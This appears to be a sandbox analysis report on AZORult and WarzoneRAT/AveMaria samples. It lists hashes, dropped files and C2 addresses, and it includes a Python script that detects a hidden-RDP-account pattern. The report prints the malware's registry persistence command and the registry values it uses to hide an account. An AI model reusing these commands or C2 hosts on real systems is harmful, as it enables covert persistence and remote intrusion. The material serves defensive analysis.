| SHA512 | 96570f3a334448cce354a784c3f9d43594a21329d2784dc459b6cc27aaba6b5132fa2d0a4b889cbdaa75394cf1c6c1bebcd5ee694f7f0528a398665c611bf936 |
\Users\Admin\AppData\Local\Temp\microF.exe
| MD5 | 100c3e2649fd32ce6d7e108e1a2ebf0d |
| SHA1 | 7f6c8fab6fa84ad9f12d4cf08cb684d525073230 |
| SHA256 | 29a4c97029dcf52e73bb65d748d1fd6194c5f7f72fe8c272320bbe38636e0f3a |
| SHA512 | 96570f3a334448cce354a784c3f9d43594a21329d2784dc459b6cc27aaba6b5132fa2d0a4b889cbdaa75394cf1c6c1bebcd5ee694f7f0528a398665c611bf936 |
memory/240-148-0x0000000000400000-0x000000000055E000-memory.dmp
memory/240-150-0x0000000000405E28-mapping.dmp
memory/752-151-0x0000000000405E28-mapping.dmp
memory/1956-157-0x0000000004835000-0x0000000004846000-memory.dmp
memory/1904-154-0x0000000004C15000-0x0000000004C26000-memory.dmp
\Users\Admin\AppData\Local\Temp\microF.exe
| MD5 | 100c3e2649fd32ce6d7e108e1a2ebf0d |
| SHA1 | 7f6c8fab6fa84ad9f12d4cf08cb684d525073230 |
| SHA256 | 29a4c97029dcf52e73bb65d748d1fd6194c5f7f72fe8c272320bbe38636e0f3a |
| SHA512 | 96570f3a334448cce354a784c3f9d43594a21329d2784dc459b6cc27aaba6b5132fa2d0a4b889cbdaa75394cf1c6c1bebcd5ee694f7f0528a398665c611bf936 |
memory/240-158-0x0000000000400000-0x000000000055E000-memory.dmp
memory/604-159-0x0000000000000000-mapping.dmp
\ProgramData\images.exe
| MD5 | 100c3e2649fd32ce6d7e108e1a2ebf0d |
| SHA1 | 7f6c8fab6fa84ad9f12d4cf08cb684d525073230 |
| SHA256 | 29a4c97029dcf52e73bb65d748d1fd6194c5f7f72fe8c272320bbe38636e0f3a |
| SHA512 | 96570f3a334448cce354a784c3f9d43594a21329d2784dc459b6cc27aaba6b5132fa2d0a4b889cbdaa75394cf1c6c1bebcd5ee694f7f0528a398665c611bf936 |
memory/1548-162-0x0000000000000000-mapping.dmp
C:\ProgramData\images.exe
| MD5 | 100c3e2649fd32ce6d7e108e1a2ebf0d |
| SHA1 | 7f6c8fab6fa84ad9f12d4cf08cb684d525073230 |
| SHA256 | 29a4c97029dcf52e73bb65d748d1fd6194c5f7f72fe8c272320bbe38636e0f3a |
| SHA512 | 96570f3a334448cce354a784c3f9d43594a21329d2784dc459b6cc27aaba6b5132fa2d0a4b889cbdaa75394cf1c6c1bebcd5ee694f7f0528a398665c611bf936 |
memory/364-165-0x0000000000170000-0x0000000000171000-memory.dmp
memory/364-161-0x0000000000000000-mapping.dmp
memory/364-167-0x0000000000290000-0x0000000000291000-memory.dmp
\Users\Admin\AppData\Local\Temp\images.exe
| MD5 | 100c3e2649fd32ce6d7e108e1a2ebf0d |
| SHA1 | 7f6c8fab6fa84ad9f12d4cf08cb684d525073230 |
| SHA256 | 29a4c97029dcf52e73bb65d748d1fd6194c5f7f72fe8c272320bbe38636e0f3a |
| SHA512 | 96570f3a334448cce354a784c3f9d43594a21329d2784dc459b6cc27aaba6b5132fa2d0a4b889cbdaa75394cf1c6c1bebcd5ee694f7f0528a398665c611bf936 |
memory/364-179-0x0000000000295000-0x00000000002A6000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\images.exe
| MD5 | 100c3e2649fd32ce6d7e108e1a2ebf0d |
| SHA1 | 7f6c8fab6fa84ad9f12d4cf08cb684d525073230 |
| SHA256 | 29a4c97029dcf52e73bb65d748d1fd6194c5f7f72fe8c272320bbe38636e0f3a |
| SHA512 | 96570f3a334448cce354a784c3f9d43594a21329d2784dc459b6cc27aaba6b5132fa2d0a4b889cbdaa75394cf1c6c1bebcd5ee694f7f0528a398665c611bf936 |
memory/1656-180-0x0000000000400000-0x000000000055E000-memory.dmp
memory/1656-176-0x0000000000405E28-mapping.dmp
memory/1564-182-0x0000000000000000-mapping.dmp
memory/1564-183-0x0000000000160000-0x0000000000161000-memory.dmp
memory/1656-184-0x0000000001080000-0x0000000001180000-memory.dmp
memory/1604-186-0x0000000000000000-mapping.dmp
\Users\Admin\AppData\Roaming\cCBy.blyi.exe
| MD5 | 50c12d57dba3671ee37e90ef48c113cb |
| SHA1 | 1478f7311bda81efc961811c2d2f28a782f7dc44 |
| SHA256 | 3b1c4fb3ad9793fe6347978b9a5b399d0ef84ad25c11ea191d217cd173b6a05d |
| SHA512 | 1a2f3fa86c747413867f74640d9d0219ba25aa5619b52d88c05dfdaecf1fa7e211e760914227995c8b55be72fecc02b26b23b38fbb655014d4e6e7c643749c6d |
C:\Users\Admin\AppData\Roaming\cCBy.blyi.exe
| MD5 | 50c12d57dba3671ee37e90ef48c113cb |
| SHA1 | 1478f7311bda81efc961811c2d2f28a782f7dc44 |
| SHA256 | 3b1c4fb3ad9793fe6347978b9a5b399d0ef84ad25c11ea191d217cd173b6a05d |
| SHA512 | 1a2f3fa86c747413867f74640d9d0219ba25aa5619b52d88c05dfdaecf1fa7e211e760914227995c8b55be72fecc02b26b23b38fbb655014d4e6e7c643749c6d |
memory/1604-191-0x0000000004B00000-0x0000000004B01000-memory.dmp
\Program Files\Microsoft DN1\sqlmap.dll
| MD5 | 461ade40b800ae80a40985594e1ac236 |
| SHA1 | b3892eef846c044a2b0785d54a432b3e93a968c8 |
| SHA256 | 798af20db39280f90a1d35f2ac2c1d62124d1f5218a2a0fa29d87a13340bd3e4 |
| SHA512 | 421f9060c4b61fa6f4074508602a2639209032fd5df5bfc702a159e3bad5479684ccb3f6e02f3e38fb8db53839cf3f41fe58a3acad6ec1199a48dc333b2d8a26 |
memory/1604-199-0x0000000004B05000-0x0000000004B16000-memory.dmp
\Users\Admin\AppData\Local\Temp\cCBy.blyi.exe
| MD5 | 50c12d57dba3671ee37e90ef48c113cb |
| SHA1 | 1478f7311bda81efc961811c2d2f28a782f7dc44 |
| SHA256 | 3b1c4fb3ad9793fe6347978b9a5b399d0ef84ad25c11ea191d217cd173b6a05d |
| SHA512 | 1a2f3fa86c747413867f74640d9d0219ba25aa5619b52d88c05dfdaecf1fa7e211e760914227995c8b55be72fecc02b26b23b38fbb655014d4e6e7c643749c6d |
C:\Users\Admin\AppData\Local\Temp\cCBy.blyi.exe
| MD5 | 50c12d57dba3671ee37e90ef48c113cb |
| SHA1 | 1478f7311bda81efc961811c2d2f28a782f7dc44 |
| SHA256 | 3b1c4fb3ad9793fe6347978b9a5b399d0ef84ad25c11ea191d217cd173b6a05d |
| SHA512 | 1a2f3fa86c747413867f74640d9d0219ba25aa5619b52d88c05dfdaecf1fa7e211e760914227995c8b55be72fecc02b26b23b38fbb655014d4e6e7c643749c6d |
memory/1752-202-0x000000000042010E-mapping.dmp
memory/1752-207-0x0000000004690000-0x0000000004691000-memory.dmp
memory/1656-208-0x0000000003EE0000-0x0000000003F56000-memory.dmp
\Users\Admin\AppData\Local\Temp\msvcp140.dll
| MD5 | 109f0f02fd37c84bfc7508d4227d7ed5 |
| SHA1 | ef7420141bb15ac334d3964082361a460bfdb975 |
| SHA256 | 334e69ac9367f708ce601a6f490ff227d6c20636da5222f148b25831d22e13d4 |
| SHA512 | 46eb62b65817365c249b48863d894b4669e20fcb3992e747cd5c9fdd57968e1b2cf7418d1c9340a89865eadda362b8db51947eb4427412eb83b35994f932fd39 |
\Users\Admin\AppData\Local\Temp\vcruntime140.dll
| MD5 | 7587bf9cb4147022cd5681b015183046 |
| SHA1 | f2106306a8f6f0da5afb7fc765cfa0757ad5a628 |
| SHA256 | c40bb03199a2054dabfc7a8e01d6098e91de7193619effbd0f142a7bf031c14d |
| SHA512 | 0b63e4979846ceba1b1ed8470432ea6aa18cca66b5f5322d17b14bc0dfa4b2ee09ca300a016e16a01db5123e4e022820698f46d9bad1078bd24675b4b181e91f |
\Users\Admin\AppData\Local\Temp\mozglue.dll
| MD5 | 75f8cc548cabf0cc800c25047e4d3124 |
| SHA1 | 602676768f9faecd35b48c38a0632781dfbde10c |
| SHA256 | fb419a60305f17359e2ac0510233ee80e845885eee60607715c67dd88e501ef0 |
| SHA512 | ed831c9c769aef3be253c52542cf032afa0a8fa5fe25ca704db65ee6883c608220df7102ac2b99ee9c2e599a0f5db99fd86894a4b169e68440eb1b0d0012672f |
\Users\Admin\AppData\Local\Temp\nss3.dll
| MD5 | d7858e8449004e21b01d468e9fd04b82 |
| SHA1 | 9524352071ede21c167e7e4f106e9526dc23ef4e |
| SHA256 | 78758bf7f3b3b5e3477e38354acd32d787bc1286c8bd9b873471b9c195e638db |
| SHA512 | 1e2c981e6c0ca36c60c6e9cae9548b866d5c524df837095b30d618d9c322def7134c20de820105400dd1b58076b66d90274f67773ac6ba914f611b419babb440 |
\Users\Admin\AppData\Local\Temp\softokn3.dll
| MD5 | 471c983513694ac3002590345f2be0da |
| SHA1 | 6612b9af4ff6830fa9b7d4193078434ef72f775b |
| SHA256 | bb3ff746471116c6ad0339fa0522aa2a44a787e33a29c7b27649a054ecd4d00f |
| SHA512 | a9b0fb923bc3b567e933de10b141a3e9213640e3d790b4c4d753cf220d55593ae8026102909969ba6bfc22da3b2fcd01e30a9f5a74bd14a0fdec9beaf0fb1410 |
\Users\Admin\AppData\Local\Temp\freebl3.dll
| MD5 | ef12ab9d0b231b8f898067b2114b1bc0 |
| SHA1 | 6d90f27b2105945f9bb77039e8b892070a5f9442 |
| SHA256 | 2b00fc4f541ac10c94e3556ff28e30a801811c36422546a546a445aca3f410f7 |
| SHA512 | 2aa62bfba556ad8f042942dd25aa071ff6677c257904377c1ec956fd9e862abcbf379e0cfd8c630c303a32ece75618c24e3eef58bddb705c427985b944689193 |
Analysis: behavioral16
Detonation Overview
Submitted
2021-07-30 15:26
Reported
2021-07-30 15:33
Platform
win7v20210410
Max time kernel
6s
Max time network
40s
Command Line
Signatures
Azorult
suricata: ET MALWARE Win32/AZORult V3.3 Client Checkin M1
VMProtect packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\571de4698edff95c328d3521b11e800a3b9659ad55281dd7729b2ce2210ac931.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\571de4698edff95c328d3521b11e800a3b9659ad55281dd7729b2ce2210ac931.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\571de4698edff95c328d3521b11e800a3b9659ad55281dd7729b2ce2210ac931.exe
"C:\Users\Admin\AppData\Local\Temp\571de4698edff95c328d3521b11e800a3b9659ad55281dd7729b2ce2210ac931.exe"
Network
| Country | Destination | Domain | Proto |
| N/A | 185.189.151.50:80 | 185.189.151.50 | tcp |
Files
memory/1656-61-0x00000000001D0000-0x00000000001D1000-memory.dmp
memory/1656-62-0x0000000000400000-0x0000000000BA7000-memory.dmp
memory/1656-63-0x00000000001C0000-0x00000000001C1000-memory.dmp
memory/1656-64-0x0000000076E11000-0x0000000076E13000-memory.dmp
Analysis: behavioral23
Detonation Overview
Submitted
2021-07-30 15:26
Reported
2021-07-30 15:33
Platform
win10v20210408
Max time kernel
11s
Max time network
120s
Command Line
Signatures
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\70d5a71e821c8024fa2d5fb8a389390acc1289b88745fad61b6536cab0bd5191.dll,#1
Network
Files
Analysis: behavioral6
Detonation Overview
Submitted
2021-07-30 15:26
Reported
2021-07-30 15:33
Platform
win7v20210410
Max time kernel
133s
Max time network
138s
Command Line
Signatures
WarzoneRat, AveMaria
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\ProgramData\images.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\images.exe | N/A |
Sets DLL path for service in the registry
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\2a0f53dd66eff57c82fcad2fff75d7ac63f6f4d764ec27fe862e6b3f01a21c03.exe | N/A |
| N/A | N/A | C:\ProgramData\images.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\images.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\images.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\images.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\images.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\images.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\images.exe | N/A |
Reads user/profile data of web browsers
Modifies WinLogon
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList | C:\Users\Admin\AppData\Local\Temp\images.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts | C:\Users\Admin\AppData\Local\Temp\images.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\JovgAfA = "0" | C:\Users\Admin\AppData\Local\Temp\images.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AllowMultipleTSSessions = "1" | C:\Users\Admin\AppData\Local\Temp\images.exe | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\System32\rfxvmt.dll | C:\Users\Admin\AppData\Local\Temp\images.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 1816 set thread context of 608 | N/A | C:\Users\Admin\AppData\Local\Temp\2a0f53dd66eff57c82fcad2fff75d7ac63f6f4d764ec27fe862e6b3f01a21c03.exe | C:\Users\Admin\AppData\Local\Temp\2a0f53dd66eff57c82fcad2fff75d7ac63f6f4d764ec27fe862e6b3f01a21c03.exe |
| PID 552 set thread context of 1576 | N/A | C:\ProgramData\images.exe | C:\Users\Admin\AppData\Local\Temp\images.exe |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File created | C:\Program Files\Microsoft DN1\sqlmap.dll | C:\Users\Admin\AppData\Local\Temp\images.exe | N/A |
| File created | C:\Program Files\Microsoft DN1\rdpwrap.ini | C:\Users\Admin\AppData\Local\Temp\images.exe | N/A |
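Taken together, the WinLogon and file-drop rows above describe one technique rather than four unrelated events: a new local account (`JovgAfA`) is hidden from the logon screen by setting it to `0` under `Winlogon\SpecialAccounts\UserList`, `AllowMultipleTSSessions` is enabled so that a remote session does not kick off the interactive user, and `rdpwrap.ini` plus `rfxvmt.dll` are the files the open-source RDP Wrapper installer writes to allow concurrent RDP on editions that do not support it. That is the hidden-RDP-account capability reported for WarzoneRAT/AveMaria. The following is an added example, not code from the sandbox; it parses the report's own table rows (copied verbatim as constructed input) back into registry and file events and evaluates that combined pattern, so the same logic can be pointed at any other run of this report format.

```python
import re

# Constructed input: signature-table rows copied verbatim from the report above.
# Columns are Description | Indicator | Process | Target.
ROWS = r"""
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList | C:\Users\Admin\AppData\Local\Temp\images.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\JovgAfA = "0" | C:\Users\Admin\AppData\Local\Temp\images.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AllowMultipleTSSessions = "1" | C:\Users\Admin\AppData\Local\Temp\images.exe | N/A |
| File created | C:\Windows\System32\rfxvmt.dll | C:\Users\Admin\AppData\Local\Temp\images.exe | N/A |
| File created | C:\Program Files\Microsoft DN1\sqlmap.dll | C:\Users\Admin\AppData\Local\Temp\images.exe | N/A |
| File created | C:\Program Files\Microsoft DN1\rdpwrap.ini | C:\Users\Admin\AppData\Local\Temp\images.exe | N/A |
"""

# "<key>\<value name> = "<data>"" as printed in the Indicator column of Set value rows.
SET_RE = re.compile(r'^(?P<key>.+?)\\(?P<name>[^\\]+) = "(?P<val>[^"]*)"$')
WINLOGON = r"\registry\machine\software\microsoft\windows nt\currentversion\winlogon"
RDP_WRAPPER_FILES = {"rdpwrap.ini", "rfxvmt.dll"}


def parse_rows(text: str) -> list:
    """Turn pipe-table rows into (kind, key_or_path, value_name, data, process) tuples."""
    events = []
    for line in text.strip().splitlines():
        cells = [c.strip() for c in line.strip().strip("|").split("|")]
        if len(cells) != 4:
            continue  # header or separator row
        desc, indicator, process, _target = cells
        if desc.startswith("Set value"):
            m = SET_RE.match(indicator)
            if m:
                events.append(("setvalue", m["key"].lower(), m["name"], m["val"], process))
        elif desc == "Key created":
            events.append(("keycreate", indicator.lower(), "", "", process))
        elif desc == "File created":
            events.append(("filecreate", indicator.lower(), "", "", process))
    return events


def hidden_rdp_account(events) -> dict:
    """Evaluate the hidden-account + multi-session + RDP Wrapper pattern over parsed events."""
    hidden = [name for kind, key, name, val, _ in events
              if kind == "setvalue" and key == WINLOGON + r"\specialaccounts\userlist" and val == "0"]
    multi_ts = any(kind == "setvalue" and key == WINLOGON
                   and name.lower() == "allowmultipletssessions" and val == "1"
                   for kind, key, name, val, _ in events)
    wrapper = sorted(key.rsplit("\\", 1)[-1] for kind, key, *_ in events
                     if kind == "filecreate" and key.rsplit("\\", 1)[-1] in RDP_WRAPPER_FILES)
    return {
        "hidden_accounts": hidden,
        "allow_multiple_ts_sessions": multi_ts,
        "rdp_wrapper_files": wrapper,
        # Any single indicator has benign explanations; the combination does not.
        "match": bool(hidden) and multi_ts and "rdpwrap.ini" in wrapper,
    }


if __name__ == "__main__":
    print(hidden_rdp_account(parse_rows(ROWS)))
```

On a live host the same three checks map directly onto `Get-ItemProperty` of the two Winlogon keys and `Test-Path` of the two files; a hidden `UserList` entry for an account that was created in the last few days, with no matching change ticket, is worth treating as a compromise indicator on its own.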
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\2a0f53dd66eff57c82fcad2fff75d7ac63f6f4d764ec27fe862e6b3f01a21c03.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\2a0f53dd66eff57c82fcad2fff75d7ac63f6f4d764ec27fe862e6b3f01a21c03.exe | N/A |
| N/A | N/A | C:\ProgramData\images.exe | N/A |
| N/A | N/A | C:\ProgramData\images.exe | N/A |
Suspicious behavior: LoadsDriver
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\2a0f53dd66eff57c82fcad2fff75d7ac63f6f4d764ec27fe862e6b3f01a21c03.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\ProgramData\images.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\images.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\images.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\2a0f53dd66eff57c82fcad2fff75d7ac63f6f4d764ec27fe862e6b3f01a21c03.exe
"C:\Users\Admin\AppData\Local\Temp\2a0f53dd66eff57c82fcad2fff75d7ac63f6f4d764ec27fe862e6b3f01a21c03.exe"
C:\Users\Admin\AppData\Local\Temp\2a0f53dd66eff57c82fcad2fff75d7ac63f6f4d764ec27fe862e6b3f01a21c03.exe
C:\Users\Admin\AppData\Local\Temp\2a0f53dd66eff57c82fcad2fff75d7ac63f6f4d764ec27fe862e6b3f01a21c03.exe
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows" /f /v Load /t REG_SZ /d "C:\ProgramData\images.exe"
C:\ProgramData\images.exe
"C:\ProgramData\images.exe"
C:\Windows\SysWOW64\reg.exe
REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows" /f /v Load /t REG_SZ /d "C:\ProgramData\images.exe"
C:\Users\Admin\AppData\Local\Temp\images.exe
C:\Users\Admin\AppData\Local\Temp\images.exe
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe"
Network
| Country | Destination | Domain | Proto |
| N/A | 8.8.8.8:53 | sdafsdffssffs.ydns.eu | udp |
| N/A | 203.159.80.107:6703 | sdafsdffssffs.ydns.eu | tcp |
| N/A | 8.8.8.8:53 | hutyrtit.ydns.eu | udp |
Files
memory/1816-59-0x0000000000B00000-0x0000000000B01000-memory.dmp
memory/1816-61-0x0000000005010000-0x0000000005011000-memory.dmp
memory/1816-62-0x0000000005015000-0x0000000005026000-memory.dmp
memory/1816-63-0x0000000000AA0000-0x0000000000AF8000-memory.dmp
memory/1816-68-0x0000000006180000-0x00000000061FB000-memory.dmp
memory/608-69-0x0000000000400000-0x000000000055E000-memory.dmp
memory/608-70-0x0000000000405E28-mapping.dmp
memory/608-71-0x00000000752B1000-0x00000000752B3000-memory.dmp
memory/608-72-0x0000000000400000-0x000000000055E000-memory.dmp
memory/968-73-0x0000000000000000-mapping.dmp
\ProgramData\images.exe
| MD5 | 069c9912fa773cada0e357556182f089 |
| SHA1 | 4f3e4f2d9b361b5747baeeb0178908a2f8d3339c |
| SHA256 | 2a0f53dd66eff57c82fcad2fff75d7ac63f6f4d764ec27fe862e6b3f01a21c03 |
| SHA512 | 3b85e7cdb73249739fd232528a2ad8ed8877e13aa5f076dcc7cde9b5f0fc2c6e46b015533a7a091ac680d46fc9d0b3bf81ce9a330d1400c94c34ada5551d7592 |
memory/552-75-0x0000000000000000-mapping.dmp
C:\ProgramData\images.exe
| MD5 | 069c9912fa773cada0e357556182f089 |
| SHA1 | 4f3e4f2d9b361b5747baeeb0178908a2f8d3339c |
| SHA256 | 2a0f53dd66eff57c82fcad2fff75d7ac63f6f4d764ec27fe862e6b3f01a21c03 |
| SHA512 | 3b85e7cdb73249739fd232528a2ad8ed8877e13aa5f076dcc7cde9b5f0fc2c6e46b015533a7a091ac680d46fc9d0b3bf81ce9a330d1400c94c34ada5551d7592 |
memory/1196-78-0x0000000000000000-mapping.dmp
memory/552-79-0x0000000000D30000-0x0000000000D31000-memory.dmp
memory/552-81-0x0000000004DE0000-0x0000000004DE1000-memory.dmp
memory/552-82-0x0000000004DE5000-0x0000000004DF6000-memory.dmp
\Users\Admin\AppData\Local\Temp\images.exe
| MD5 | 069c9912fa773cada0e357556182f089 |
| SHA1 | 4f3e4f2d9b361b5747baeeb0178908a2f8d3339c |
| SHA256 | 2a0f53dd66eff57c82fcad2fff75d7ac63f6f4d764ec27fe862e6b3f01a21c03 |
| SHA512 | 3b85e7cdb73249739fd232528a2ad8ed8877e13aa5f076dcc7cde9b5f0fc2c6e46b015533a7a091ac680d46fc9d0b3bf81ce9a330d1400c94c34ada5551d7592 |
memory/1576-91-0x0000000000405E28-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\images.exe
| MD5 | 069c9912fa773cada0e357556182f089 |
| SHA1 | 4f3e4f2d9b361b5747baeeb0178908a2f8d3339c |
| SHA256 | 2a0f53dd66eff57c82fcad2fff75d7ac63f6f4d764ec27fe862e6b3f01a21c03 |
| SHA512 | 3b85e7cdb73249739fd232528a2ad8ed8877e13aa5f076dcc7cde9b5f0fc2c6e46b015533a7a091ac680d46fc9d0b3bf81ce9a330d1400c94c34ada5551d7592 |
memory/1576-94-0x0000000000400000-0x000000000055E000-memory.dmp
memory/384-96-0x0000000000000000-mapping.dmp
memory/384-97-0x00000000000F0000-0x00000000000F1000-memory.dmp
memory/1576-98-0x0000000003990000-0x0000000003A90000-memory.dmp
\Program Files\Microsoft DN1\sqlmap.dll
| MD5 | 461ade40b800ae80a40985594e1ac236 |
| SHA1 | b3892eef846c044a2b0785d54a432b3e93a968c8 |
| SHA256 | 798af20db39280f90a1d35f2ac2c1d62124d1f5218a2a0fa29d87a13340bd3e4 |
| SHA512 | 421f9060c4b61fa6f4074508602a2639209032fd5df5bfc702a159e3bad5479684ccb3f6e02f3e38fb8db53839cf3f41fe58a3acad6ec1199a48dc333b2d8a26 |
memory/1576-100-0x0000000004260000-0x00000000042E4000-memory.dmp
\Users\Admin\AppData\Local\Temp\msvcp140.dll
| MD5 | 109f0f02fd37c84bfc7508d4227d7ed5 |
| SHA1 | ef7420141bb15ac334d3964082361a460bfdb975 |
| SHA256 | 334e69ac9367f708ce601a6f490ff227d6c20636da5222f148b25831d22e13d4 |
| SHA512 | 46eb62b65817365c249b48863d894b4669e20fcb3992e747cd5c9fdd57968e1b2cf7418d1c9340a89865eadda362b8db51947eb4427412eb83b35994f932fd39 |
\Users\Admin\AppData\Local\Temp\vcruntime140.dll
| MD5 | 7587bf9cb4147022cd5681b015183046 |
| SHA1 | f2106306a8f6f0da5afb7fc765cfa0757ad5a628 |
| SHA256 | c40bb03199a2054dabfc7a8e01d6098e91de7193619effbd0f142a7bf031c14d |
| SHA512 | 0b63e4979846ceba1b1ed8470432ea6aa18cca66b5f5322d17b14bc0dfa4b2ee09ca300a016e16a01db5123e4e022820698f46d9bad1078bd24675b4b181e91f |
\Users\Admin\AppData\Local\Temp\mozglue.dll
| MD5 | 75f8cc548cabf0cc800c25047e4d3124 |
| SHA1 | 602676768f9faecd35b48c38a0632781dfbde10c |
| SHA256 | fb419a60305f17359e2ac0510233ee80e845885eee60607715c67dd88e501ef0 |
| SHA512 | ed831c9c769aef3be253c52542cf032afa0a8fa5fe25ca704db65ee6883c608220df7102ac2b99ee9c2e599a0f5db99fd86894a4b169e68440eb1b0d0012672f |
\Users\Admin\AppData\Local\Temp\nss3.dll
| MD5 | d7858e8449004e21b01d468e9fd04b82 |
| SHA1 | 9524352071ede21c167e7e4f106e9526dc23ef4e |
| SHA256 | 78758bf7f3b3b5e3477e38354acd32d787bc1286c8bd9b873471b9c195e638db |
| SHA512 | 1e2c981e6c0ca36c60c6e9cae9548b866d5c524df837095b30d618d9c322def7134c20de820105400dd1b58076b66d90274f67773ac6ba914f611b419babb440 |
\Users\Admin\AppData\Local\Temp\freebl3.dll
| MD5 | ef12ab9d0b231b8f898067b2114b1bc0 |
| SHA1 | 6d90f27b2105945f9bb77039e8b892070a5f9442 |
| SHA256 | 2b00fc4f541ac10c94e3556ff28e30a801811c36422546a546a445aca3f410f7 |
| SHA512 | 2aa62bfba556ad8f042942dd25aa071ff6677c257904377c1ec956fd9e862abcbf379e0cfd8c630c303a32ece75618c24e3eef58bddb705c427985b944689193 |
\Users\Admin\AppData\Local\Temp\softokn3.dll
| MD5 | 471c983513694ac3002590345f2be0da |
| SHA1 | 6612b9af4ff6830fa9b7d4193078434ef72f775b |
| SHA256 | bb3ff746471116c6ad0339fa0522aa2a44a787e33a29c7b27649a054ecd4d00f |
| SHA512 | a9b0fb923bc3b567e933de10b141a3e9213640e3d790b4c4d753cf220d55593ae8026102909969ba6bfc22da3b2fcd01e30a9f5a74bd14a0fdec9beaf0fb1410 |
Analysis: behavioral17
Detonation Overview
Submitted
2021-07-30 15:26
Reported
2021-07-30 15:33
Platform
win10v20210408
Max time kernel
21s
Max time network
119s
Command Line
Signatures
Azorult
suricata: ET MALWARE Win32/AZORult V3.3 Client Checkin M18
VMProtect packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\571de4698edff95c328d3521b11e800a3b9659ad55281dd7729b2ce2210ac931.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\571de4698edff95c328d3521b11e800a3b9659ad55281dd7729b2ce2210ac931.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\571de4698edff95c328d3521b11e800a3b9659ad55281dd7729b2ce2210ac931.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\571de4698edff95c328d3521b11e800a3b9659ad55281dd7729b2ce2210ac931.exe
"C:\Users\Admin\AppData\Local\Temp\571de4698edff95c328d3521b11e800a3b9659ad55281dd7729b2ce2210ac931.exe"
Network
| Country | Destination | Domain | Proto |
| N/A | 185.189.151.50:80 | 185.189.151.50 | tcp |
Files
memory/3628-114-0x0000000000CD0000-0x0000000000CD1000-memory.dmp
memory/3628-115-0x0000000000CE0000-0x0000000000CE1000-memory.dmp
memory/3628-116-0x0000000000400000-0x0000000000BA7000-memory.dmp
memory/3628-117-0x0000000000BB0000-0x0000000000CFA000-memory.dmp
Analysis: behavioral18
Detonation Overview
Submitted
2021-07-30 15:26
Reported
2021-07-30 15:33
Platform
win7v20210410
Max time kernel
148s
Max time network
197s
Command Line
Signatures
Process spawned unexpected child process
| Description | Indicator | Process | Target |
| Parent C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE is not expected to spawn this process | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE |
